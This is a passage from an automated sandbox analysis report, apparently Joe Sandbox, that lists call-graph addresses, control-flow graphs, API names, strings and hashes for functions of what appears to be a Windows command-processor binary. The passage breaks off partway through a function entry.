7ff7ab131fac 238 API calls 22425->22429 22430 7ff7ab12d044 ??_V@YAXPEAX 22425->22430 22443 7ff7ab12df60 22425->22443 22463 7ff7ab14c738 22425->22463 22427 7ff7ab1304f4 3 API calls 22426->22427 22427->22425 22429->22425 22430->22425 22432 7ff7ab13596c 22431->22432 22436 7ff7ab135a12 22431->22436 22433 7ff7ab13598d VirtualQuery 22432->22433 22432->22436 22434 7ff7ab1359ad 22433->22434 22433->22436 22435 7ff7ab1359b7 VirtualQuery 22434->22435 22434->22436 22435->22434 22435->22436 22436->22319 22442 7ff7ab1476a3 22437->22442 22438 7ff7ab1476b7 22439 7ff7ab14e9b4 197 API calls 22438->22439 22441 7ff7ab1476bc longjmp 22439->22441 22440 7ff7ab1296b4 186 API calls 22440->22442 22442->22438 22442->22440 22444 7ff7ab12df93 22443->22444 22446 7ff7ab12dfe2 22443->22446 22445 7ff7ab12df9f GetProcessHeap RtlFreeHeap 22444->22445 22444->22446 22445->22444 22445->22446 22447 7ff7ab12e100 VirtualFree 22446->22447 22448 7ff7ab12e00b _setjmp 22446->22448 22447->22446 22449 7ff7ab12e04a 22448->22449 22450 7ff7ab12e0c3 22448->22450 22451 7ff7ab12e600 473 API calls 22449->22451 22450->22396 22452 7ff7ab12e073 22451->22452 22453 7ff7ab12e081 22452->22453 22454 7ff7ab12e0e0 longjmp 22452->22454 22456 7ff7ab12d250 475 API calls 22453->22456 22455 7ff7ab12e0b0 22454->22455 22455->22450 22473 7ff7ab14d3fc 22455->22473 22457 7ff7ab12e086 22456->22457 22457->22455 22460 7ff7ab12e600 473 API calls 22457->22460 22461 7ff7ab12e0a7 22460->22461 22461->22455 22462 7ff7ab14d610 167 API calls 22461->22462 22462->22455 22464 7ff7ab14c775 22463->22464 22471 7ff7ab14c7ab 22463->22471 22465 7ff7ab12cd90 166 API calls 22464->22465 22467 7ff7ab14c781 22465->22467 22466 7ff7ab14c8d4 22466->22425 22467->22466 22468 7ff7ab12b0d8 194 API calls 22467->22468 22468->22466 22469 7ff7ab12b6b0 170 API calls 22469->22471 22470 7ff7ab12b038 _dup2 22470->22471 22471->22466 22471->22467 22471->22469 22471->22470 22472 7ff7ab12d208 _close 22471->22472 22472->22471 22484 7ff7ab14d419 22473->22484 22474 7ff7ab13cadf 22475 7ff7ab133448 166 API calls 22475->22484 22476 7ff7ab14d592 22477 7ff7ab133448 166 API calls 22476->22477 22481 7ff7ab14d5a5 22477->22481 22478 7ff7ab14d5c4 22479 7ff7ab133448 166 API calls 22478->22479 22479->22474 22483 7ff7ab14d5ba 22481->22483 22487 7ff7ab133448 166 API calls 22481->22487 22482 7ff7ab14d546 22482->22478 22485 7ff7ab14d555 22482->22485 22491 7ff7ab14d36c 22483->22491 22484->22474 22484->22475 22484->22476 22484->22478 22484->22485 22486 7ff7ab14d541 22484->22486 22489 7ff7ab14d3fc 166 API calls 22484->22489 22498 7ff7ab14d31c 22485->22498 22486->22476 22486->22478 22486->22482 22490 7ff7ab14d589 22486->22490 22487->22483 22489->22484 22490->22476 22490->22485 22492 7ff7ab14d3d8 22491->22492 22493 7ff7ab14d381 22491->22493 22494 7ff7ab1334a0 166 API calls 22493->22494 22496 7ff7ab14d390 22494->22496 22495 7ff7ab133448 166 API calls 22495->22496 22496->22492 22496->22495 22497 7ff7ab1334a0 166 API calls 22496->22497 22497->22496 22499 7ff7ab133448 166 API calls 22498->22499 22500 7ff7ab14d33b 22499->22500 22501 7ff7ab14d36c 166 API calls 22500->22501 22502 7ff7ab14d343 22501->22502 22503 7ff7ab14d3fc 166 API calls 22502->22503 22520 7ff7ab14d34e 22503->22520 22504 7ff7ab14d5c2 22504->22474 22505 7ff7ab14d592 22506 7ff7ab133448 166 API calls 22505->22506 22510 7ff7ab14d5a5 22506->22510 22507 7ff7ab14d5c4 22508 7ff7ab133448 166 API calls 22507->22508 22508->22504 22509 7ff7ab14d31c 166 API calls 22509->22504 22512 7ff7ab14d5ba 22510->22512 22515 7ff7ab133448 166 API calls 22510->22515 22511 7ff7ab14d546 22511->22507 22513 7ff7ab14d555 22511->22513 22516 7ff7ab14d36c 166 API calls 22512->22516 22513->22509 22514 7ff7ab14d541 22514->22505 22514->22507 22514->22511 22518 7ff7ab14d589 22514->22518 22515->22512 22516->22504 22517 7ff7ab14d3fc 166 API calls 22517->22520 22518->22505 22518->22513 22519 7ff7ab133448 166 API calls 22519->22520 22520->22504 22520->22505 22520->22507 22520->22513 22520->22514 22520->22517 22520->22519 22522 7ff7ab12c4c9 22521->22522 22523 7ff7ab12c486 22521->22523 22526 7ff7ab12ff70 2 API calls 22522->22526 22528 7ff7ab12c161 22522->22528 22524 7ff7ab12c48e wcschr 22523->22524 22523->22528 22525 7ff7ab12c4ef 22524->22525 22524->22528 22527 7ff7ab12cd90 166 API calls 22525->22527 22526->22528 22534 7ff7ab12c4f9 22527->22534 22528->22136 22528->22159 22529 7ff7ab12c5bd 22530 7ff7ab12c541 22529->22530 22533 7ff7ab12b6b0 170 API calls 22529->22533 22530->22528 22532 7ff7ab12ff70 2 API calls 22530->22532 22531 7ff7ab12d840 178 API calls 22531->22534 22532->22528 22533->22530 22534->22528 22534->22529 22534->22530 22534->22531 22536 7ff7ab12b018 22535->22536 22536->22198 22537->22198 22539 7ff7ab1272de 22538->22539 22540 7ff7ab144621 22538->22540 22542 7ff7ab1272eb 22539->22542 22546 7ff7ab144467 22539->22546 22547 7ff7ab144530 22539->22547 22541 7ff7ab1447e0 22540->22541 22543 7ff7ab14447b longjmp 22540->22543 22548 7ff7ab144639 22540->22548 22566 7ff7ab14475e 22540->22566 22544 7ff7ab127348 168 API calls 22541->22544 22599 7ff7ab127348 22542->22599 22549 7ff7ab144492 22543->22549 22550 7ff7ab144524 22544->22550 22546->22542 22546->22549 22558 7ff7ab144475 22546->22558 22555 7ff7ab127348 168 API calls 22547->22555 22552 7ff7ab14463e 22548->22552 22553 7ff7ab144695 22548->22553 22554 7ff7ab127348 168 API calls 22549->22554 22560 7ff7ab1272b0 168 API calls 22550->22560 22563 7ff7ab127323 22550->22563 22552->22543 22564 7ff7ab144654 22552->22564 22557 7ff7ab1273d4 168 API calls 22553->22557 22574 7ff7ab1444a8 22554->22574 22575 7ff7ab144549 22555->22575 22556 7ff7ab127315 22614 7ff7ab1273d4 22556->22614 22579 7ff7ab14469a 22557->22579 22558->22543 22558->22553 22559 7ff7ab127348 168 API calls 22559->22541 22567 7ff7ab14480e 22560->22567 22561 7ff7ab127348 168 API calls 22561->22556 22563->22234 22576 7ff7ab127348 168 API calls 22564->22576 22565 7ff7ab1445b2 22569 7ff7ab127348 168 API calls 22565->22569 22566->22559 22567->22234 22568 7ff7ab1446e1 22571 7ff7ab1272b0 168 API calls 22568->22571 22572 7ff7ab1445c7 22569->22572 22570 7ff7ab14455e 22570->22565 22580 7ff7ab127348 168 API calls 22570->22580 22578 7ff7ab144738 22571->22578 22581 7ff7ab127348 168 API calls 22572->22581 22573 7ff7ab1444e2 22577 7ff7ab1272b0 168 API calls 22573->22577 22574->22573 22582 7ff7ab127348 168 API calls 22574->22582 22575->22565 22575->22570 22587 7ff7ab127348 168 API calls 22575->22587 22576->22563 22583 7ff7ab1444f1 22577->22583 22584 7ff7ab127348 168 API calls 22578->22584 22579->22568 22590 7ff7ab1446ea 22579->22590 22591 7ff7ab1446c7 22579->22591 22580->22565 22585 7ff7ab1445db 22581->22585 22582->22573 22586 7ff7ab1272b0 168 API calls 22583->22586 22584->22550 22588 7ff7ab127348 168 API calls 22585->22588 22589 7ff7ab144503 22586->22589 22587->22570 22592 7ff7ab1445ec 22588->22592 22589->22563 22595 7ff7ab127348 168 API calls 22589->22595 22593 7ff7ab127348 168 API calls 22590->22593 22591->22568 22596 7ff7ab127348 168 API calls 22591->22596 22594 7ff7ab127348 168 API calls 22592->22594 22593->22568 22597 7ff7ab144600 22594->22597 22595->22550 22596->22568 22598 7ff7ab127348 168 API calls 22597->22598 22598->22550 22603 7ff7ab12735d 22599->22603 22600 7ff7ab123278 166 API calls 22601 7ff7ab144820 longjmp 22600->22601 22602 7ff7ab144838 22601->22602 22604 7ff7ab123278 166 API calls 22602->22604 22603->22600 22603->22602 22603->22603 22613 7ff7ab1273ab 22603->22613 22605 7ff7ab144844 longjmp 22604->22605 22606 7ff7ab14485a 22605->22606 22607 7ff7ab127348 166 API calls 22606->22607 22608 7ff7ab14487b 22607->22608 22609 7ff7ab127348 166 API calls 22608->22609 22610 7ff7ab1448ad 22609->22610 22611 7ff7ab127348 166 API calls 22610->22611 22612 7ff7ab1272ff 22611->22612 22612->22556 22612->22561 22615 7ff7ab127401 22614->22615 22615->22563 22616 7ff7ab127348 168 API calls 22615->22616 22617 7ff7ab14487b 22616->22617 22618 7ff7ab127348 168 API calls 22617->22618 22619 7ff7ab1448ad 22618->22619 22620 7ff7ab127348 168 API calls 22619->22620 22621 7ff7ab1448be 22620->22621 22621->22563

                                                                                                          Executed Functions

                                                                                                          Function 00007FF7AB130A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                          • API String ID: 3305344409-4288247545
                                                                                                          • Opcode ID: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                                          • Instruction ID: 79d77c98f87dcad91783f6f28e59adca2d96c93fe89fa48cbd7ceb25bee9b742
                                                                                                          • Opcode Fuzzy Hash: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                                          • Instruction Fuzzy Hash: AE42DB21A0A68285EB9AAB19F4542B9E791FF4579CFC64230DD1E477F4EF3CE1588320
                                                                                                          Function 00007FF7AB12AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 216 7ff7ab12aa54-7ff7ab12aa98 call 7ff7ab12cd90 219 7ff7ab13bf5a-7ff7ab13bf70 call 7ff7ab134c1c call 7ff7ab12ff70 216->219 220 7ff7ab12aa9e 216->220 221 7ff7ab12aaa5-7ff7ab12aaa8 220->221 223 7ff7ab12acde-7ff7ab12ad00 221->223 224 7ff7ab12aaae-7ff7ab12aac8 wcschr 221->224 229 7ff7ab12ad06 223->229 224->223 226 7ff7ab12aace-7ff7ab12aae9 towlower 224->226 226->223 228 7ff7ab12aaef-7ff7ab12aaf3 226->228 231 7ff7ab12aaf9-7ff7ab12aafd 228->231 232 7ff7ab13beb7-7ff7ab13bec4 call 7ff7ab14eaf0 228->232 233 7ff7ab12ad0d-7ff7ab12ad1f 229->233 235 7ff7ab13bbcf 231->235 236 7ff7ab12ab03-7ff7ab12ab07 231->236 243 7ff7ab13bec6-7ff7ab13bed8 call 7ff7ab123240 232->243 244 7ff7ab13bf43-7ff7ab13bf59 call 7ff7ab134c1c 232->244 237 7ff7ab12ad22-7ff7ab12ad2a call 7ff7ab1313e0 233->237 245 7ff7ab13bbde 235->245 240 7ff7ab12ab09-7ff7ab12ab0d 236->240 241 7ff7ab12ab7d-7ff7ab12ab81 236->241 237->221 247 7ff7ab13be63 240->247 248 7ff7ab12ab13-7ff7ab12ab17 240->248 246 7ff7ab12ab87-7ff7ab12ab95 241->246 241->247 243->244 261 7ff7ab13beda-7ff7ab13bee9 call 7ff7ab123240 243->261 244->219 257 7ff7ab13bbea-7ff7ab13bbec 245->257 252 7ff7ab12ab98-7ff7ab12aba0 246->252 254 7ff7ab13be72-7ff7ab13be88 call 7ff7ab123278 call 7ff7ab134c1c 247->254 248->241 253 7ff7ab12ab19-7ff7ab12ab1d 248->253 252->252 258 7ff7ab12aba2-7ff7ab12abb3 call 7ff7ab12cd90 252->258 253->245 259 7ff7ab12ab23-7ff7ab12ab27 253->259 281 7ff7ab13be89-7ff7ab13be8c 254->281 267 7ff7ab13bbf8-7ff7ab13bc01 257->267 258->219 272 7ff7ab12abb9-7ff7ab12abde call 7ff7ab1313e0 call 7ff7ab1333a8 258->272 259->257 263 7ff7ab12ab2d-7ff7ab12ab31 259->263 276 7ff7ab13beeb-7ff7ab13bef1 261->276 277 7ff7ab13bef3-7ff7ab13bef9 261->277 263->229 264 7ff7ab12ab37-7ff7ab12ab3b 263->264 264->267 269 7ff7ab12ab41-7ff7ab12ab45 264->269 267->233 273 7ff7ab12ab4b-7ff7ab12ab4f 269->273 274 7ff7ab13bc06-7ff7ab13bc2a call 7ff7ab1313e0 269->274 306 7ff7ab12ac75 272->306 307 7ff7ab12abe4-7ff7ab12abe7 272->307 279 7ff7ab12ad2f-7ff7ab12ad33 273->279 280 7ff7ab12ab55-7ff7ab12ab78 call 7ff7ab1313e0 273->280 301 7ff7ab13bc5a-7ff7ab13bc61 274->301 302 7ff7ab13bc2c-7ff7ab13bc4c _wcsnicmp 274->302 276->244 276->277 277->244 282 7ff7ab13befb-7ff7ab13bf0d call 7ff7ab123240 277->282 290 7ff7ab12ad39-7ff7ab12ad3d 279->290 291 7ff7ab13bc66-7ff7ab13bc8a call 7ff7ab1313e0 279->291 280->221 286 7ff7ab12acbe 281->286 287 7ff7ab13be92-7ff7ab13beaa call 7ff7ab123278 call 7ff7ab134c1c 281->287 282->244 313 7ff7ab13bf0f-7ff7ab13bf21 call 7ff7ab123240 282->313 298 7ff7ab12acc0-7ff7ab12acc7 286->298 340 7ff7ab13beab-7ff7ab13beb6 call 7ff7ab134c1c 287->340 293 7ff7ab13bcde-7ff7ab13bd02 call 7ff7ab1313e0 290->293 294 7ff7ab12ad43-7ff7ab12ad49 290->294 319 7ff7ab13bc8c-7ff7ab13bcaa _wcsnicmp 291->319 320 7ff7ab13bcc4-7ff7ab13bcdc 291->320 335 7ff7ab13bd2a 293->335 336 7ff7ab13bd04-7ff7ab13bd24 _wcsnicmp 293->336 304 7ff7ab13bd5e-7ff7ab13bd65 294->304 305 7ff7ab12ad4f-7ff7ab12ad68 294->305 298->298 310 7ff7ab12acc9-7ff7ab12acda 298->310 308 7ff7ab13bd31-7ff7ab13bd4f _wcsnicmp 301->308 302->301 303 7ff7ab13bc4e-7ff7ab13bc55 302->303 314 7ff7ab13bbb3-7ff7ab13bbb7 303->314 304->305 315 7ff7ab13bd6b-7ff7ab13bd73 304->315 316 7ff7ab12ad6a 305->316 317 7ff7ab12ad6d-7ff7ab12ad70 305->317 323 7ff7ab12ac77-7ff7ab12ac7f 306->323 307->286 318 7ff7ab12abed-7ff7ab12ac0b call 7ff7ab12cd90 * 2 307->318 325 7ff7ab13bbc2-7ff7ab13bbca 308->325 326 7ff7ab13bd55 308->326 310->223 313->244 343 7ff7ab13bf23-7ff7ab13bf35 call 7ff7ab123240 313->343 327 7ff7ab13bbba-7ff7ab13bbbd call 7ff7ab1313e0 314->327 328 7ff7ab13be4a-7ff7ab13be5e 315->328 329 7ff7ab13bd79-7ff7ab13bd8b iswxdigit 315->329 316->317 317->237 318->340 356 7ff7ab12ac11-7ff7ab12ac14 318->356 319->320 333 7ff7ab13bcac-7ff7ab13bcbf 319->333 320->308 323->286 331 7ff7ab12ac81-7ff7ab12ac85 323->331 325->221 326->304 327->325 328->327 329->328 338 7ff7ab13bd91-7ff7ab13bda3 iswxdigit 329->338 342 7ff7ab12ac88-7ff7ab12ac8f 331->342 333->314 335->308 336->335 341 7ff7ab13bbac 336->341 338->328 344 7ff7ab13bda9-7ff7ab13bdbb iswxdigit 338->344 340->232 341->314 342->342 346 7ff7ab12ac91-7ff7ab12ac94 342->346 343->244 358 7ff7ab13bf37-7ff7ab13bf3e call 7ff7ab123240 343->358 344->328 351 7ff7ab13bdc1-7ff7ab13bdd7 iswdigit 344->351 346->286 349 7ff7ab12ac96-7ff7ab12acaa wcsrchr 346->349 349->286 357 7ff7ab12acac-7ff7ab12acb9 call 7ff7ab131300 349->357 354 7ff7ab13bdd9-7ff7ab13bddd 351->354 355 7ff7ab13bddf-7ff7ab13bdeb towlower 351->355 361 7ff7ab13bdee-7ff7ab13be0f iswdigit 354->361 355->361 356->340 362 7ff7ab12ac1a-7ff7ab12ac33 memset 356->362 357->286 358->244 363 7ff7ab13be17-7ff7ab13be23 towlower 361->363 364 7ff7ab13be11-7ff7ab13be15 361->364 362->306 365 7ff7ab12ac35-7ff7ab12ac4b wcschr 362->365 366 7ff7ab13be26-7ff7ab13be45 call 7ff7ab1313e0 363->366 364->366 365->306 367 7ff7ab12ac4d-7ff7ab12ac54 365->367 366->328 368 7ff7ab12ac5a-7ff7ab12ac6f wcschr 367->368 369 7ff7ab12ad72-7ff7ab12ad91 wcschr 367->369 368->306 368->369 371 7ff7ab12ad97-7ff7ab12adac wcschr 369->371 372 7ff7ab12af03-7ff7ab12af07 369->372 371->372 373 7ff7ab12adb2-7ff7ab12adc7 wcschr 371->373 372->306 373->372 374 7ff7ab12adcd-7ff7ab12ade2 wcschr 373->374 374->372 375 7ff7ab12ade8-7ff7ab12adfd wcschr 374->375 375->372 376 7ff7ab12ae03-7ff7ab12ae18 wcschr 375->376 376->372 377 7ff7ab12ae1e-7ff7ab12ae21 376->377 378 7ff7ab12ae24-7ff7ab12ae27 377->378 378->372 379 7ff7ab12ae2d-7ff7ab12ae40 iswspace 378->379 380 7ff7ab12ae4b-7ff7ab12ae5e 379->380 381 7ff7ab12ae42-7ff7ab12ae49 379->381 382 7ff7ab12ae66-7ff7ab12ae6d 380->382 381->378 382->382 383 7ff7ab12ae6f-7ff7ab12ae77 382->383 383->254 384 7ff7ab12ae7d-7ff7ab12ae97 call 7ff7ab1313e0 383->384 387 7ff7ab12ae9a-7ff7ab12aea4 384->387 388 7ff7ab12aebc-7ff7ab12aef8 call 7ff7ab130a6c call 7ff7ab12ff70 * 2 387->388 389 7ff7ab12aea6-7ff7ab12aead 387->389 388->323 397 7ff7ab12aefe 388->397 389->388 390 7ff7ab12aeaf-7ff7ab12aeba 389->390 390->387 390->388 397->281
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                                          • API String ID: 972821348-467788257
                                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                          • Instruction ID: 751eb7f962b7d793ba3889f909c250019c7013fee953a46f920da3de5c2b07a6
                                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                          • Instruction Fuzzy Hash: 6F22B721A0A682C5EB5ABF2DF554279E691EF45B88FCA8135C90E473B4EF3DA444C370
                                                                                                          Function 00007FF7AB1351EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 398 7ff7ab1351ec-7ff7ab135248 call 7ff7ab135508 GetLocaleInfoW 401 7ff7ab13524e-7ff7ab135272 GetLocaleInfoW 398->401 402 7ff7ab13ef32-7ff7ab13ef3c 398->402 404 7ff7ab135295-7ff7ab1352b9 GetLocaleInfoW 401->404 405 7ff7ab135274-7ff7ab13527a 401->405 403 7ff7ab13ef3f-7ff7ab13ef49 402->403 408 7ff7ab13ef4b-7ff7ab13ef52 403->408 409 7ff7ab13ef61-7ff7ab13ef6c 403->409 406 7ff7ab1352de-7ff7ab135305 GetLocaleInfoW 404->406 407 7ff7ab1352bb-7ff7ab1352c3 404->407 410 7ff7ab1354f7-7ff7ab1354f9 405->410 411 7ff7ab135280-7ff7ab135286 405->411 414 7ff7ab135307-7ff7ab13531b 406->414 415 7ff7ab135321-7ff7ab135343 GetLocaleInfoW 406->415 412 7ff7ab1352c9-7ff7ab1352d7 407->412 413 7ff7ab13ef75-7ff7ab13ef78 407->413 408->409 416 7ff7ab13ef54-7ff7ab13ef5f 408->416 409->413 410->402 411->410 417 7ff7ab13528c-7ff7ab13528f 411->417 412->406 420 7ff7ab13ef7a-7ff7ab13ef7d 413->420 421 7ff7ab13ef99-7ff7ab13efa3 413->421 414->415 418 7ff7ab135349-7ff7ab13536e GetLocaleInfoW 415->418 419 7ff7ab13efaf-7ff7ab13efb9 415->419 416->403 416->409 417->404 423 7ff7ab13eff2-7ff7ab13effc 418->423 424 7ff7ab135374-7ff7ab135396 GetLocaleInfoW 418->424 422 7ff7ab13efbc-7ff7ab13efc6 419->422 420->406 425 7ff7ab13ef83-7ff7ab13ef8d 420->425 421->419 426 7ff7ab13efc8-7ff7ab13efcf 422->426 427 7ff7ab13efde-7ff7ab13efe9 422->427 428 7ff7ab13efff-7ff7ab13f009 423->428 429 7ff7ab13539c-7ff7ab1353be GetLocaleInfoW 424->429 430 7ff7ab13f035-7ff7ab13f03f 424->430 425->421 426->427 431 7ff7ab13efd1-7ff7ab13efdc 426->431 427->423 432 7ff7ab13f00b-7ff7ab13f012 428->432 433 7ff7ab13f021-7ff7ab13f02c 428->433 434 7ff7ab13f078-7ff7ab13f082 429->434 435 7ff7ab1353c4-7ff7ab1353e6 GetLocaleInfoW 429->435 436 7ff7ab13f042-7ff7ab13f04c 430->436 431->422 431->427 432->433 438 7ff7ab13f014-7ff7ab13f01f 432->438 433->430 437 7ff7ab13f085-7ff7ab13f08f 434->437 439 7ff7ab13f0bb-7ff7ab13f0c5 435->439 440 7ff7ab1353ec-7ff7ab13540e GetLocaleInfoW 435->440 441 7ff7ab13f04e-7ff7ab13f055 436->441 442 7ff7ab13f064-7ff7ab13f06f 436->442 443 7ff7ab13f0a7-7ff7ab13f0b2 437->443 444 7ff7ab13f091-7ff7ab13f098 437->444 438->428 438->433 445 7ff7ab13f0c8-7ff7ab13f0d2 439->445 446 7ff7ab13f0fe-7ff7ab13f108 440->446 447 7ff7ab135414-7ff7ab135436 GetLocaleInfoW 440->447 441->442 448 7ff7ab13f057-7ff7ab13f062 441->448 442->434 443->439 444->443 449 7ff7ab13f09a-7ff7ab13f0a5 444->449 450 7ff7ab13f0ea-7ff7ab13f0f5 445->450 451 7ff7ab13f0d4-7ff7ab13f0db 445->451 454 7ff7ab13f10b-7ff7ab13f115 446->454 452 7ff7ab13543c-7ff7ab13545e GetLocaleInfoW 447->452 453 7ff7ab13f141-7ff7ab13f14b 447->453 448->436 448->442 449->437 449->443 450->446 451->450 458 7ff7ab13f0dd-7ff7ab13f0e8 451->458 459 7ff7ab13f184-7ff7ab13f18b 452->459 460 7ff7ab135464-7ff7ab135486 GetLocaleInfoW 452->460 457 7ff7ab13f14e-7ff7ab13f158 453->457 455 7ff7ab13f117-7ff7ab13f11e 454->455 456 7ff7ab13f12d-7ff7ab13f138 454->456 455->456 461 7ff7ab13f120-7ff7ab13f12b 455->461 456->453 462 7ff7ab13f15a-7ff7ab13f161 457->462 463 7ff7ab13f170-7ff7ab13f17b 457->463 458->445 458->450 464 7ff7ab13f18e-7ff7ab13f198 459->464 465 7ff7ab13548c-7ff7ab1354ae GetLocaleInfoW 460->465 466 7ff7ab13f1c4-7ff7ab13f1ce 460->466 461->454 461->456 462->463 468 7ff7ab13f163-7ff7ab13f16e 462->468 463->459 469 7ff7ab13f19a-7ff7ab13f1a1 464->469 470 7ff7ab13f1b0-7ff7ab13f1bb 464->470 471 7ff7ab13f207-7ff7ab13f20e 465->471 472 7ff7ab1354b4-7ff7ab1354f5 setlocale call 7ff7ab138f80 465->472 467 7ff7ab13f1d1-7ff7ab13f1db 466->467 474 7ff7ab13f1dd-7ff7ab13f1e4 467->474 475 7ff7ab13f1f3-7ff7ab13f1fe 467->475 468->457 468->463 469->470 477 7ff7ab13f1a3-7ff7ab13f1ae 469->477 470->466 476 7ff7ab13f211-7ff7ab13f21b 471->476 474->475 479 7ff7ab13f1e6-7ff7ab13f1f1 474->479 475->471 480 7ff7ab13f21d-7ff7ab13f224 476->480 481 7ff7ab13f233-7ff7ab13f23e 476->481 477->464 477->470 479->467 479->475 480->481 482 7ff7ab13f226-7ff7ab13f231 480->482 482->476 482->481
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                          • API String ID: 1351325837-2236139042
                                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                          • Instruction ID: 023e1e2112c6c82e44016d12d2dc4239781cb0b8cb1a2849af190030379c36e4
                                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                          • Instruction Fuzzy Hash: 42F16C31B0A74285EA56AF1DF9502B9A7A5BF04B88FD64136CA1D473B4EF3CE509C360
                                                                                                          Function 00007FF7AB134224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
